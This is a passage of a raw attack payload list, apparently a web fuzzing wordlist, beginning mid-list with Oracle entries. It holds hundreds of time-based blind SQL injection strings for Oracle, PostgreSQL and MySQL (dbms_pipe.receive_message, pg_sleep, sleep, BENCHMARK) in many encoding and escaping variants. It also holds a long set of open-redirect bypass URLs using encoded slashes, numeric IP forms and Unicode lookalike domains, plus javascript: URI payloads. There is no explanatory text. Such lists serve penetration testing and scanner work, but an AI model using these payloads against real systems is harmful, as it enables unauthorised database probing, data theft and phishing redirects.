\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message(1,120)
\\r\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(1,120)
\\r\\n or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n and 1337=dbms_pipe.receive_message(('a'),120)
\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n and 1337=dbms_pipe.receive_message(1,120)
\n and 1337=dbms_pipe.receive_message(1,120) -- 
\n or 1337=dbms_pipe.receive_message(('a'),120)
\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n or 1337=dbms_pipe.receive_message(1,120)
\n or 1337=dbms_pipe.receive_message(1,120) -- 
\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\r\n and 1337=dbms_pipe.receive_message(('a'),120)
\r\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n and 1337=dbms_pipe.receive_message(1,120)
\r\n and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n or 1337=dbms_pipe.receive_message(('a'),120)
\r\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n or 1337=dbms_pipe.receive_message(1,120)
\r\n or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  --

postgresql

;SELECT pg_sleep(10);
;SELECT pg_sleep(10);
SELECT pg_sleep(10);
1 SELECT pg_sleep(10);
or SELECT pg_sleep(10);
(SELECT pg_sleep(10))
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
' or pg_sleep(10)--
1) or pg_sleep(10)--
") or pg_sleep(10)--
') or pg_sleep(10)--
1)) or pg_sleep(10)--
")) or pg_sleep(10)--
')) or pg_sleep(10)--
pg_SLEEP(10)
pg_SLEEP(10)--
pg_SLEEP(10)#
or pg_SLEEP(10)
or pg_SLEEP(10)--
or pg_SLEEP(10)#
' SELECT pg_sleep(10);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND (1337=1337
or pg_sleep(10)--
) or pg_sleep(10)--
)) or pg_sleep(10)--
 and 1337=(select 1337 from pg_sleep(120))
 and 1337=(select 1337 from pg_sleep(120)) -- 
 or 1337=(select 1337 from pg_sleep(120))
 or 1337=(select 1337 from pg_sleep(120)) -- 
%00 and 1337=(select 1337 from pg_sleep(120))
%00 and 1337=(select 1337 from pg_sleep(120)) -- 
%00 or 1337=(select 1337 from pg_sleep(120))
%00 or 1337=(select 1337 from pg_sleep(120)) -- 
%00' and 1337=(select 1337 from pg_sleep(120)) -- 
%00' or 1337=(select 1337 from pg_sleep(120)) -- 
%00';select pg_sleep(120) -- 
%00;select pg_sleep(120)
%00;select pg_sleep(120) -- 
%00\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\';select pg_sleep(120) -- 
%00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\\';select pg_sleep(120) -- 
%0a and 1337=(select 1337 from pg_sleep(120))
%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0a or 1337=(select 1337 from pg_sleep(120))
%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a';select pg_sleep(120) -- 
%0a;select pg_sleep(120)
%0a;select pg_sleep(120) -- 
%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\';select pg_sleep(120) -- 
%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\';select pg_sleep(120) -- 
%0d%0a and 1337=(select 1337 from pg_sleep(120))
%0d%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a or 1337=(select 1337 from pg_sleep(120))
%0d%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a';select pg_sleep(120) -- 
%0d%0a;select pg_sleep(120)
%0d%0a;select pg_sleep(120) -- 
%0d%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\';select pg_sleep(120) -- 
%0d%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\';select pg_sleep(120) -- 
' and 1337=(select 1337 from pg_sleep(120)) -- 
' or 1337=(select 1337 from pg_sleep(120)) -- 
';select pg_sleep(120) -- 
0x00 and 1337=(select 1337 from pg_sleep(120))
0x00 and 1337=(select 1337 from pg_sleep(120)) -- 
0x00 or 1337=(select 1337 from pg_sleep(120))
0x00 or 1337=(select 1337 from pg_sleep(120)) -- 
0x00' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00';select pg_sleep(120) -- 
0x00;select pg_sleep(120)
0x00;select pg_sleep(120) -- 
0x00\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\';select pg_sleep(120) -- 
0x00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\';select pg_sleep(120) -- 
0x0a and 1337=(select 1337 from pg_sleep(120))
0x0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a or 1337=(select 1337 from pg_sleep(120))
0x0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a';select pg_sleep(120) -- 
0x0a;select pg_sleep(120)
0x0a;select pg_sleep(120) -- 
0x0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\';select pg_sleep(120) -- 
0x0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\';select pg_sleep(120) -- 
0x0d0a and 1337=(select 1337 from pg_sleep(120))
0x0d0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a or 1337=(select 1337 from pg_sleep(120))
0x0d0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a';select pg_sleep(120) -- 
0x0d0a;select pg_sleep(120)
0x0d0a;select pg_sleep(120) -- 
0x0d0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\';select pg_sleep(120) -- 
0x0d0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\';select pg_sleep(120) -- 
;select pg_sleep(120)
;select pg_sleep(120) -- 
\' and 1337=(select 1337 from pg_sleep(120)) -- 
\' or 1337=(select 1337 from pg_sleep(120)) -- 
\';select pg_sleep(120) -- 
\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\';select pg_sleep(120) -- 
\\n and 1337=(select 1337 from pg_sleep(120))
\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\n or 1337=(select 1337 from pg_sleep(120))
\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n';select pg_sleep(120) -- 
\\n;select pg_sleep(120)
\\n;select pg_sleep(120) -- 
\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\';select pg_sleep(120) -- 
\\r\\n and 1337=(select 1337 from pg_sleep(120))
\\r\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n or 1337=(select 1337 from pg_sleep(120))
\\r\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n';select pg_sleep(120) -- 
\\r\\n;select pg_sleep(120)
\\r\\n;select pg_sleep(120) -- 
\\r\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\';select pg_sleep(120) -- 
\n and 1337=(select 1337 from pg_sleep(120))
\n and 1337=(select 1337 from pg_sleep(120)) -- 
\n or 1337=(select 1337 from pg_sleep(120))
\n or 1337=(select 1337 from pg_sleep(120)) -- 
\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\n';select pg_sleep(120) -- 
\n;select pg_sleep(120)
\n;select pg_sleep(120) -- 
\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\n\';select pg_sleep(120) -- 
\r\n and 1337=(select 1337 from pg_sleep(120))
\r\n and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n or 1337=(select 1337 from pg_sleep(120))
\r\n or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n';select pg_sleep(120) -- 
\r\n;select pg_sleep(120)
\r\n;select pg_sleep(120) -- 
\r\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\';select pg_sleep(120) --

xor

'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
'XOR(if(now()=sysdate(),sleep(10),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
(SELECT * FROM (SELECT(SLEEP(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000,sha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
(select(0)from(select(sleep(10)))v)
'%2b(select*from(select(sleep(10)))a)%2b'
(select*from(select(sleep(10)))a)
1'%2b(select*from(select(sleep(10)))a)%2b'
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))

开放重定向

/%09/google.com
/%2f%2fgoogle.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cgoogle.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.google.com
//%09/google.com
//%5cgoogle.com
///%09/google.com
///%5cgoogle.com
////%09/google.com
////%5cgoogle.com
/////google.com
/////google.com/
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
///google.com
///google.com/
//google.com/%2f..
///google.com/%2f..
https://google.com/%2f..
//www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
//google.com/
https://google.com/
//google.com//
///google.com//
https://google.com//
//www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
////www.google.com/%2e%2e
https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https://%09/google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
http://0xd8.0x3a.0xd6.0xce
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
//google.com
//google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
/&lt;&gt;//google.com
/?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/?url=/\/google.com&next=/\/google.com&redirect=/\/google.com&redirect_uri=/\/google.com
/?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://google.com&rurl=Https://google.com&redirect_uri=Https://google.com&lt;br/&gt;/\/\/google.com/
/google.com/%2f%2e%2e
/http://google.com
/http:/google.com
/https:/%5cgoogle.com/
/https://%5cgoogle.com
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https:google.com
/redirect?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/redirect?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://example.com&rurl=Https://google.com&redirect_uri=Https://google.com
//%2fxgoogle.com
//localdomain%E3%80%82pw
http://0xd83ad6ce
http://3627734734
http://472.314.470.462
http://0330.072.0326.0316
http://00330.00072.0000326.00000316
http://0xd8.072.54990
http://0xd8.3856078
http://00330.3856078
http://00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:3627734734
http:472.314.470.462
http:0330.072.0326.0316
http:00330.00072.0000326.00000316
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:0xd8.072.54990
http:0xd8.3856078
http:00330.3856078
http:00330.0x3a.54990
&lt;&gt;//google.com
http://.google.com
https://google.com/https://google.com/
http://google.com\tgoogle.com/
//google.com\tgoogle.com/
http://google.com%2f%2f.google.com/
http://google.com%5c%5c.google.com/
http://google.com%3F.google.com/
http://google.com%23.google.com/
http://google.com:80%40google.com/
http://google.com%2egoogle.com/
/〱ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
〱ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
//%2f%2fgoogle.com
/%2f%2fⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%2f%2fⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
\\google.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
//%2F/google.com
/%0D/google.com
/%2F/google.com
/%5Cgoogle.com
/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
////%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/\google%252ecom
google%252ecom
../google.com
//google%00.com
////google.com
//\/google.com/
//\google.com
/<>//google.com
/\/\/google.com/
/\/google.com
/\google.com
/google.com
//google.com/%2E%2E
//google.com/%2F.. 
/google.com/%2F.. 
//google.com//%2F%2E%2E
google.com/.jpg
http:%0a%0dgoogle.com
http:%0a%0dⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:/\/\google.com
http:/google.com
http:google.com
/http:/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http://.ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
http:ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https://%09/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https://%0a%0dgoogle.com
https://%0a%0dⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https%3a%2f%2fgoogle.com%2f
https:/%5cgoogle.com/
/https:/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
/https://%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
https:/%5cⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https:/\google.com
https://google%E3%80%82com
//https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
https:ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//https:///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
//https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
/https:///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
/https://ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
javascript:confirm(1)
javascript:prompt(1)
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00｡Ｐⓦ
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
/.ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
/////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
//\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂//
/\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
<>//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂
\/\/ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/
